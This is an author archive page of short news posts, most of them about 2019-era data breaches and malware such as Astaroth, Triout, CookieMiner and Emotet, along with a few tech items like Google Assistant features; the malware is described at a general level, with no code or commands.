Author Archives: Toshavi Newaskar

Massive HIV Data Leak: Thousands of Detailed Records Compromised.












In a recent major data leak in Singapore, thousands of HIV positive people’s records were compromised.


One of the victims of this leak was informed via a phone call that her record was out in the open along with those of approx. 14,000 others.

This enormous leak came off as really shocking to people as many of them were reluctant to let the fact surface in outer world.

The main target which has emerged in this database leakage incident is the Singaporean media.

The government said that a local doctor who had an American partner, who had access to all the records in question, is the main person who’s at fault.

Reportedly, according to the authorities the leak has been contained but an extreme emotional damage has been caused to the HIV infected.

In Singapore, as mandated by the law, the aforementioned victim’s HIV status was added to the national database.

The HIV registry was set up in 1985 by the ministry of health to keep a check on the infection and potential cases’ status.

The previously mentioned database is the one which got compromised accompanied by the names and addresses of more than 14,000 people.

According to the sources the name of the American partner has been reported to be as, Mikhy Farrera-Brochez. The data and the access to the registry had been wrested from his Singaporean doctor partner.

Mikhy couldn’t work in Singapore because as the Singaporean law states so. But he got convicted of fraud because he used someone else’s blood to pass a mandatory HIV test.

According to Mikhy there is more to the story of the leakage and it’s not just him who’s behind it all. He also said that he had contracted HIV in prison and that he was denied medication.

He also blamed Singapore for using the HIV database for keeping track of gay men in the country because same-sex sex there is illegal.

To this accusation Singaporean authorities have replied negatively and cited that the statement is absolutely untrue.

Singapore’s health minister is working with the authorities of the US regarding the case.
Earlier there was a total ban on people with HIV entering the borders of Singapore, which got lifted in 2015.

But the people who have married Singaporean citizens or have permanent residencies in the country could dodge it.

This leak has come as a shock as well as emotionally degrading. This chaotic circumstance has made the citizens question the way records are kept in security.

One of the senior doctors who have been working on safeguarding the interests of the HIV patients in Singapore said that many implementations exist which restrict the doctors from accessing such records.

This incident has wreaked a lot of emotional havoc to people who are infected and whose names are in those compromised records.

The victims aren’t even sure that whether the leak has actually been contained or not.

This leaked information could ruin a lot of lives and careers for the infected.

The victims are seriously concerned about the diaspora of the detailed information and the compromised records.


Artificial Intelligence To Aid Scientists Understand Earth Better






According to a latest study in the scientific field, computer sciences are all set to collaborate with geography. With the help of Artificial Intelligence complex processes of the planet Earth could now be understood better.

The Friedrich Schiller University’s researchers got behind the books to carry out the aforementioned study, wherein it’s clear that the AI has a lot to contribute to life science.

Climatic conditions and the study of the Earth systems would now become substantially easy to comprehend.

This ability to understand things better would contribute in improving the already existing systems and models on the Earth’s surface.

Before AI got involved, the investigations done regarding the Earth were merely about static elements including the soil properties from a global scale.

More high-tech techniques will now be employed to handle the processes better, all thanks to Artificial Intelligence.

Variations in largely global land processes like photosynthesis could also be now monitored and all the considerations could be deliberated beforehand.


The Earth system data along with a myriad of sensors is now available so that tracking and comprehending the 'Earthian' processes by the aid of AI would now be an easy job.

This new collaboration is very promising element as processes that are beyond human understanding could now be estimated.

Imagine recognition, natural language processing and classical machine learning applications are all that are encompassed within the new techniques available.

Hurricanes, fire spreads and other complex processes leveraged by local conditions are some of the examples for the application.

Soil movement, vegetation dynamics, ocean transport and other basic themes regarding the Earth’s science and systems also lie within the category of the application.

Data dependent statistical techniques no matter how well the data quality, are not always certifiable and hence susceptible to exploitation.

Hence, machine learning needs to an essential part which would also solve the issue regarding storage capacity and data processing.




Physical and mechanical techniques if brought together would absolutely make a huge difference. It would then be possible to model the motion of ocean’s water and to predict the temperature of the sea surface.

According to what one of the researchers behind the study cited, the major motive is bringing together the “best of both worlds”.

In light of this study, warnings regarding natural calamities or any other extreme events including the climatic and weather possibilities would become way easier than ever were.

Websites Including Ixigo Hacked, Leaving 127 Million Accounts Exposed For Sale






Over 127 million accounts were broken into from around 8 separate websites. This is the doing of a hacker who’d stolen records of 620 million people before.

The travel booking site “Ixigo” seems to be one of the major victims from which records were stolen.

Allegedly, these infamous records include the users’ names, email addresses, passwords and other personal details.

According to a research, 18 million user records were wrested from Ixigo and around 40 million were stolen from YouNow which is a live-video streaming site.

1.8 million accounts were wrested from Ge.tt and 57 million records were snatched off from Houzz.

Hakcer’s listings showed that an antiquated “MD5” hashing algorithm was applied to “scramble” passwords which are otherwise easy to “unscramble”.

It was claimed by the hacker themselves that they had user records from mainstream sites like MyFitnessPal and Animoto with declaring number of records to be 151 million and 25 million respectively.

Bitcoin currency of $20,000 could now be used in exchange for databases which make life easier for hackers, from the Dream Market cyber-souk in the Tor network.

The price is pretty hacker-pocket friendly. The major target audience for the deal seem to be spammers and credential stuffers.

These credentials could further be used to hack into other sites and wrest other user details.

The victimized websites have started alerting their users about the hazard and it would only be fit for the users to stay vigilant about it all.

Astaroth- The Tojan That Abuses Anti-Virus Software To Steal Data




A new Trojan has surfaced which disguises itself as GIF and image files and tries to exploit the anti-virus software to harvest the data on the user’s PC.

A security research team brought the situation to everyone’s notice that this variant supposedly makes use of the modules in the cyber-security software.

The exploitation of the modules leads to the cyber-con getting hold of the victim’s data including online credentials

The Trojan in the guise of an extension-less files tries to move around the victim’s PC undetected.

By the use of spam emails and phishing messages, the victim’s lured into downloading the malicious file and then the actual Microsoft Windows BITSAdmin tool is used to download the full payload from a command-and-control (C2) server.

The malware then launches an XSL script and finalizes a channel with the C2 server. The script is obfuscated and contains functions to shroud itself from the anti-virus software.

The same script is responsible for the process which influences BITSAdmin to download payloads which include Astaroth from a different C2 server.

The old version of this Trojan used to launch a scan to look for the anti-virus programs, and in case of the presence of “Avast”, the malware used to quit.



But as it turns out with Astaroth, the antivirus software would now be abused and a malicious module would be injected into one of its processes.

The exploitation of these systems is called LOL bins, Living Off the Land binaries. GAS, an anti-fraud security program could be abused in the same way.

This Trojan first surfaced in the year 2017 in South America. It targets machines, passwords and other data. Astaroth is also capable of Keylog and could intercept calls and terminate processes.

The malware employs a “ fromCharCode() deobfuscation ” method to conceal code execution, which is an upgrade on older versions of Astaroth.

LOLbins seem to have a lot of malicious potential including stealing credentials and personal data. This method is highly attractive to cyber-cons and hence needs to be prepared against.

Android Spyware "Triout" Back With Spying Abilities And New Malicious Schemes






An android malware in the guise of an online privacy app, is all set to cause a lot of harm as it’s resurfaced as a more malicious version of itself and has acquired spy abilities.

The application tries to trick the users into downloading and then starts working its method.

Triout, the application is created to help users dodge censorship on the internet.

The campaign had been active since May last year, under the guise of an adult 
application.

August, 2018 is when the spyware was discovered, because of the massive amounts of information it was harvesting, including photos, text conversations, and phone conversations.

Collecting GPS information about the victims and making the user’s location vulnerable are two of the other mal effects.


With changed tactics and better malicious effects to it, the malware is being distributed under the cloaks of a stolen but legit privacy tool from Google play store.

Psiphon is the privacy tool behind whose face version Triout is hiding. This application is widely used and has been downloaded like a million times.

Third party sites also provide this app on their platforms, in case hackers don’t seem to have access to play store of Google.

The fake version of Psiphon works in exactly the same way as the real version of it. The looks and the interface have all been cleverly matched.



A particular type of set of victims is being targeted via Triout so that it doesn’t raise much suspicion.

When the malware was discovered it was found to be targeting users from Germany and South Korea.

Spear-phishing is another concept that is reportedly being employed by the cyber-cons to ensure that the users download their malicious app.

The way to lure in the victims and the commands and controls of Triout have been cunningly altered to extract a hike in the success rate.


Reportedly, the updated versions of Triout are being uploaded from various distinct locations of the world, a few being Russia, France and US.

The origin of the campaign and the cyber-cons behind it are still behind the curtain and this is what makes Triout more malicious.

According to the leading security researchers, this application possesses super spying powers and is deliberately fabricated to perform activities like espionage.

The researchers implore the users to download applications only from official sites and try to steer clear off any suspicious looking applications and refrain from downloading it.

Thousands Of Users Thrashed By Extremely Real-looking-Fake-Scans Scam



Thousands of users have encountered a severe threat from scammers who are employing cunning use of JavaScript and HTML codes by way of “Potentially Unwanted Applications”.

A major security researching organization uncovered a recent development in the scamming area where PUAs and POAs are being employed.

These scams could be categorized as tech-support scams which primarily work on scaring the victim into doing something unforeseen by the victim themselves.

After fake-calls, potentially unwanted applications have become quite common, but the latest twist is the shrewd usage of JavaScript and HTML code.

These codes specifically work on making the fake scans seem implausibly real, making it faster and easier for the scanners to fool their prey.

The well-known Norton Security applications are basically being stolen from the aforementioned organization.

These scams are in no way comparable to the basic and obvious anti-virus scams that are run on a common basis.

The scammers make the scan look so legit that it never occurs to the victim to question it at all.

There sure is an alert which pops up. The users think of it to be as one from an anti-malware app, when it’s actually coming from a web browser.

The way the scanners go around is that they offer an infection to be paired up by way of a 10-second scan. This obviously lures the users in swiftly.

A web-based dashboard is being implemented by the scammers to manage and monitor all the scams that are happening.

Thousands of dollars have been wrested from the victims that too by using overtly basic, fake looking contrivances.

Last three months of 2018 had been really busy for Symantec, the aforementioned organization, as they’ve blocked PUA installations around 89 million times.

There are several points that have to be kept in mind, for instance, no pop up is capable of analyzing the hard drive and the real files on it.

No anti-malware supplication would ask the user to download a separate application for the update process.

The best way to get saved from this kind of threat is looking out for an alert that mentions the remaining days left in the so called “subscription”.

CookieMiner: Steals Passwords From Cookies, Chrome And iPhone Texts!



There’s a new malware CookieMiner, prevalent in the market which binges on saved passwords on Chrome, iPhone text messages and Mac-tethered iTunes backups.

A world-wide cyber-security organization not of very late uncovered a malicious malware which gorges on saved user credentials like passwords and usernames.

This activity has been majorly victimizing passwords saved onto Google Chrome, credit card credentials saved onto Chrome and iPhone text messages backed up to Mac.

Reportedly, what the malware does is that it gets hold of the browser cookies in relation with mainstream crypto-currency exchanges which also include wallet providing websites the user has gone through.

The surmised motive behind the past acts of the miner seems to be the excruciating need to bypass the multi-factor authentication for the sites in question.

Having dodged the main security procedure, the cyber-con behind the attack would be absolutely free to access the victim’s exchange account or the wallet so being used and to exploit the funds in them.

Web cookies are those pieces of information which get automatically stored onto the web server, the moment a user signs in.

Hence, exploitation of those cookies directly means exploiting the very user indirectly.

Cookie theft is the easiest way to dodge login anomaly detection, as if the username and passwords are used by an amateur, the alarms might set off and another authentication request may get sent.

Whereas if the username passwords are used along with the cookie the entire session would absolutely be considered legit and no alert would be issued after all.

Most of the fancy wallet and crypto-currency exchange websites have multi-factor authentication.

All that the CookieMiner does is that it tries to create combinations and try them in order to slide past the authentication process.

A cyber-con could treat such a vulnerable opportunity like a gold mine and could win a lot out of it.

In addition to Google’s Chrome, Apple’s Safari is also a web browser being openly targeted. As it turns out, the choice for the web browser target depends upon its recognition.

The malware seems to have additional malignancy to it as it also finds a way to download a “CoinMiner” onto the affected system/ device.

Google’s Research App- ‘Screenwise Meter’ To Encroach Apple’s Policies?



Apparently, a research application was being run by Google, which could potentially violate Apple’s policies, the same way Facebook once did.

“Screenwise Meter” is the name of the infamous application, so being mentioned.

It’s an invitation-only program which works on collecting data and its monitoring onto phones and in return guarantees gift cards.

The application uses an “Enterprise Certificate”, named “Sideload” which was revoked from Facebook.

Due to this revocation, a lot of havoc was wreaked within the ‘employee-only’ apps of Facebook on iPhones.

After what happened with Facebook, there were likewise chances of Google’s certificate being revoked by Apple too.

But before that could happen, Google, shut its ‘Screenwise Meter’ down and apologized for putting the application into Apple’s Enterprise Program in the first place.

The application was always meant to be voluntary, cited one of the spokespersons of Google, and also that it has now been entirely disabled on all the iOS devices.

Altran Technologies, France; Smacked By A Cyber-Attack!




Reportedly, the France based Altran Technologies fell prey to a cyber-attack which attempted to smack down its operations in some of the European nations.



Last Thursday, a cyber-attack took the French engineering consultancy, Altran Technologies by storm.



This led to the organization’s closing down its It network and applications.



The firm instantly started working on a resurgence plan, making sure that it didn’t undergo much damage.



A large scale “Domain Name System” hijacking campaign is already being investigated and is subject to a lot of questioning.



This campaign is said to have wreaked havoc among a lot of government as well as commercial organizations, all across the world, cited the Britain’s National Cyber Security Center.

The Return Of Trojan Poses Substantial Hacking Threat To Businesses!




The Trojan malware has returned with its infectious ransomware attacks with an aim to harvest banking credentials and personal and property related data.




Business organizations have come out to become the latest targets of this malware.



With long-term and insidious operations as ambition, the Trojan poses a lot of threat even to intellectual property.



In one of the new reports of one of the reputed security companies, it was mentioned that backdoor attacks against businesses with Trojans as back power have subsequently increased.



According to the aforementioned security lab, “Trojans” and “Backdoors” are different.



A Trojan is supposed to perform one function but ends up performing another and a Backdoor is a type of Trojan which enables a threat actor to access a system via bypassing security.



“Spyware” attacks have also consequentially risen. A spyware is a malware which aids gaining information on a device and sending it to a third party, stealthily.



This concept, of a spyware, sure is old but still is as efficacious as any other powerful malware and strictly works towards data exfiltration.



The “Emotet Trojan” has been considered to be behind the information stealing campaigns all round last year and in the beginning of this moth too.



This Trojan could move through networks, harvest data, and monitor networks. Also, it could easily infect systems by reproducing with no substantial effort at all.



Emotet is a self-sufficient danger which tends to spread onto compromised systems in addition to installing other malware on them.

The menacing behavior of TrickBot was also inferred upon by the aforementioned report, as it’s one of the by-products of Emotet.



The constantly evolving TrickBot daily gets updated with new abilities, stealing passwords and browser histories and harvesting sensitive data being a few of them.



Consultancy firms seem to be the primary targets of the Trojan. It is disposed towards harvesting more than just banking details and personal information.



Intellectual property is another thing which is a major point of concern for everyone now that the cyber-cons have stooped down to breaching walls using Trojans.



These tactics were thought to be really boring and old but have taken serious tosses and turns and have evolved into something genuinely perilous.



Businesses should stop under-estimating the attacks and keep a keen eye towards any potentiality of such attacks.

China Launches An App Which Works Like A Debtor Radar!






















Giving apps an absolutely new dimension, China recently launched an app which works like a radar for people who are in debt.


Reportedly this application was developed on the instructions of the Chinese police. The app was created in the Chinese province of Hebei.



The application tends to display the locations of people in debt, whenever the person using the app is within 500 yards of them.



The major inspiration behind the application is the need to report the citizens who spend more than they should.



The application which goes by the name of “Map of Deadbeat Debtors” could be accessed via ‘WeChat’. (A social media app)



It's being claimed that the users are instantly alerted via a flash when they stand within 500 meters of a debtor.



The exact location of the debtor is displayed, if there's any appearance of personal information hasn't been confirmed yet.


It's an initiative which works towards citizens keeping a lookout for potential debtors, regardless of the seriousness of the debt.


  
Apparently, owing a debt is considered inappropriate in the culturally rich country of China.



The new reforms in the social credit system of the country are to be held responsible for the idea of the application.




The latest system is just the thing which the country needs and will judge the citizens on the basis of their social behavior.

Over 200 Million Chinese CVs Compromised On The Dark Web


Over 200 Million Chinese CVs Compromised Online







Recently, a database comprising of over 200 million Chinese CVs was discovered online in a compromised position where it was laid bare for the dark web to devour. Naturally, it spilled explicitly detailed information.



Having lacked, fundamentally basic security endeavors, the database exposed some really personal data of people.



The database encompassed their names, addresses, mobile phone numbers, email addresses, education details and other what-not.



The much detailed information on the base was developed by persistently scouring various Chinese job sites.



Reportedly, the director of the researching institution cited on the issue that at the outset, the data was thought to be gained from a huge classified advert site, namely, BJ.58.com.



Nevertheless, BJ.58.com, vehemently denied the citation and their relation with this accident.



They had thoroughly analysed and checked their databases and found nothing questionable, hence reassuring that they had no role to play in the data leakage.



They also mentioned that certainly some third-party CV website “Scraper” is to blame.



It was via twitter that the news about this data cache first floated among people, and soon after that, it was removed from Amazon cloud where it had been stored.



But, as it turned out while further analyzing, before it was deleted it had previously been copied around 12 times.



There has been a series of incidents where the Chinese have been cyber-affected, and this data loss is the latest of all.



From online rail bookings to allegedly stealing rail travelers personal data, the early days of January were quite bad for the Beijing people.



Reportedly, in August last year, the police of China were busy investigating a data breach of hotel records of over 500 million customers.



Personal data, including the booking details and accounts, registration details and other similar information were leaked.



Also, the Internet Society of China had released a report wherein the several phishing attacks and data breaches the country’s residents had faced were mentioned.

Bitcoin Ransom Of $950,000 Paid To Kidnappers For An American Man Who’s Still Missing!


Bitcoin Ransom Of $950,000 Paid To Kidnappers For An American Man Who’s Still Missing







A Bitcoin ransom of $950,000 was demanded by the kidnappers in exchange for a United States’ businessman. Despite having paid it the abducted man is still missing.


The missing man, who was the owner of an online gambling platform, has been identified as William Sean Creighton Kopko.



The man had gone missing in Costa Rica, where last September, reportedly he was wrested unawares.



All around 12 persons were arrested by the Spanish and Costa Rican police, in relation with the aforementioned kidnapping.



The family of Kopko had to pay the much demanded ransom of bitcoin worth $950K , after which the kidnappers cut the communication.



The kidnappers under suspicion absconded to Cuba, suddenly and returned to Spain in early November of 2018.



These suspects then rented an apartment and that’s when they got arrested in Zaragoza, Spain.



Tech savvy criminals have always been keen on crypto-currency and hence the harvesting of bitcoin has always been a thing.



Also, sometime earlier criminals posing as students willing to learn about bitcoin tortured a man into revealing their passwords to crypto-currency accounts.



There have been recent cases wherein, in exchange for kidnapped wives and other important entities, crypto-currency has been asked for.



Apparently, demanding bitcoins as ransom has become the latest thing.



Over 30 Thousand Patient Records Exposed; Third-Party Breach To Blame




Cyber-cons recently targeted another health target. ‘Managed Health Services of Indiana Health Plan’ in recent times went public regarding the third-party data breach they had gotten imperiled by, which exposed 31,000 patients’ personal details out in the open. 


This breach was the result of one of the two security incidents that the institution had to face.



There are two major healthcare programs, namely, ‘Indiana’s Hoosier Healthwise’, and ‘Hooseir Care Connect Medicaid’ which this organization runs.


The MHS were informed about the breach by one of its vendors. The information was regarding someone having illegitimately gained access to their employees’ email accounts.


Disconcertingly, according to the reports, the unauthorized accessed had occurred between the month of July and September, last year.


During the investigation initiated by the MHS, it was found out that patients’ personal data including their names, insurance ID numbers, dates of birth, dates of services provided and their addresses were all potentially out in the open.


As the investigation unfolded, it was discovered that the incident was caused due to a phishing attack on the vendor’s system.


Rapid steps were taken by the vendor to counter the attack by the aid of a computer forensic company.


Some of the information in the email accounts that were affected was laid out pretty bare to be accessed. The email accounts “hacked” were the main source of information.


The easiest trick to harvesting personal data is performing a phishing attack. The phishing attack anywhere in the entire chain could affect all the people involved.


As a result of the overall effect on the chain, 31,ooo people got affected and had their data exposed and out in the open.


 Reportedly, this has been the 4th in the list of attacks made on the health plans, that too in the last month alone.


It gets evident after such an attack, that the health-care industry exceedingly requires better management and security cyber systems.

Google Assistant Is All stacked Up With Loads Of New Features




Google Assistant is all up for going forward and acquiring the latest and to do that it’s absolutely set for providing its users with exceedingly awaited fresh features and integrations.

Some of these features have been on the demand list of Google Assistant’s users. Let’s check out what the fresh integrations and features are.

Interpreter Mode
Helping users to have a conversation in different languages is what Google home devices are all up for. The ‘Interpreter Mode’ will help translate in real-time and will narrate the entire translation out loud; in case of smart displays the text will also be shown on-screen.
Command: “Hey Google, be my Spanish interpreter”

Google Assistant Connect
This is an economic means and a manifesto for manufacturers so that they could add Google Assistant into their products. It is easily expandable to new devices by way of existing smart home platforms.
An e-link is provided which helps to display calendar and weather. The information is delivered via a smart speaker within the house.(already existing)

This program could be accessed by the manufacturers in late 2019.

Google Maps Integration
At last, Google Maps and Google Assistant are shaking hands. Users will now soon be able to convey their Map data such as their ETA to their friends.
Similarly, replying to text messages, adding new destinations, searching for new places on the route and so much more.
Google notes will also be synchronized with Google Assistant.

Flight Check-Ins
The most awaited feature is the flight check-in; via this inclusion, Google Assistant would help the users to easily check into their flights and access boarding passes.
Also the Assistant will send notifications regarding check-ins and other related stuff.
Command: “Hey Google, check into my flight.”

Newly Announced Devices
Google has made some really interesting announcements regarding the latest devices it’s about to launch pretty soon.
Brands like JBL, Anker, Whirlpool, and Verizon are employing Google Assistant in one way or another.
Sonos will also have Assistant pretty soon, especially Sonos Beam and Sonos One. The older models will have the Assistant via an update.
Smart displays, watches, cars and audio devices are a few on the list of devices which will have in a few weeks the Assistant’s assistance.